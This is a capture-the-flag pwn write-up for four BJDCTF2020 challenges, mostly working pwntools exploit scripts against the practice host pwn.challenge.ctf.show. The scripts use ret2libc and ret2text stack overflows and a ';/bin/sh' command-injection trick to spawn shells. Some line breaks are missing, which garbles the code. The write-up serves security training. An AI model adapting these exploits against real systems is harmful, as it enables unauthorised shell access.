PWN-PRACTICE-CTFSHOW-4
- BJDCTF2020-babyrouter
- BJDCTF2020-babystack
- BJDCTF2020-dizzy
- BJDCTF2020-encryptde stack
BJDCTF2020-babyrouter
栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28034)
elf=ELF("./pwn1")puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4006AD
pop_rdi=0x400733
ret=0x4004c9io.recvuntil("tell me u story!\n")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
binsh=libc_base+0x18cd57io.recvuntil("tell me u story!\n")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)io.interactive()BJDCTF2020-babystack
栈溢出,ret2text
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28177)
elf=ELF("./pwn1")io.sendlineafter("the length of your name:\n","-1")backdoor=0x4006E6
ret=0x400561
io.recvuntil("u name?\n")
payload="a"*0x10+"b"*8+p64(ret)+p64(backdoor)
io.sendline(payload)io.interactive()BJDCTF2020-dizzy
利用linux系统命令行多命令执行的特点
Linux 系统可以在一个命令行上执行多个命令:; --如果命令被分号(;)所分隔,那么命令会连续的执行下去,就算是错误的命令也会继续执行后面的命令&& --如果命令被 && 所分隔,那么命令也会一直执行下去,但是中间有错误的命令就不会执行后面的命令,没错就继续执行直至命令执行完为止|| --如果命令被双竖线 || 所分隔,那么一遇到可以执行成功的命令就会停止执行后面的命令,而不管后面的命令是否正确。如果执行到错误的命令就是继续执行后一个命令,直到遇到执行到正确的命令或命令执行完为止
构造输入,使之能在进行加0x1BF52后得到"PvvN| 1S S0 GREAT!;/bin/sh\x00",分号前的命令会失败,但仍然会执行system("/bin/sh\x00")
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28161)
elf=ELF("./pwn1")s="PvvN| 1S S0 GREAT!;/bin/sh".ljust(80,"\x00")
arr=[]
for i in range(0,len(s),4):tmp=hex(ord(s[i+3]))[2:].zfill(2)tmp+= hex(ord(s[i + 2]))[2:].zfill(2)tmp+= hex(ord(s[i + 1]))[2:].zfill(2)tmp+= hex(ord(s[i + 0]))[2:].zfill(2)arr.append(int(tmp,16))
for i in range(len(arr)):arr[i]-=0x1BF52#io.recvuntil("Let's play this!")
for i in range(20):io.sendline(str(arr[i]))io.interactive()BJDCTF2020-encryptde stack
程序打印随机数作为RSA密文,解RSA得到明文,循环20次,然后栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
import libnum
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28163)
elf=ELF("./pwn1")n=94576960329497431
e=65537
p=261571747
q=361571773
phin=(p-1)*(q-1)
d=libnum.invmod(e,phin)io.recvuntil("to encrypt it\n")
for i in range(20):c=int(io.recvuntil("\n")[:-1])m=pow(c,d,n)io.sendline(str(m))io.recvline()puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
vuln_addr=0x400B30
pop_rdi=0x40095a
ret=0x4006e1io.recvuntil("inpu1t you name:\n")
payload="a"*0x48+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
binsh=libc_base+0x18cd57io.recvuntil("inpu1t you name:\n")
payload="a"*0x48+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(vuln_addr)
io.sendline(payload)io.interactive()
——需求分析与数据库设计)
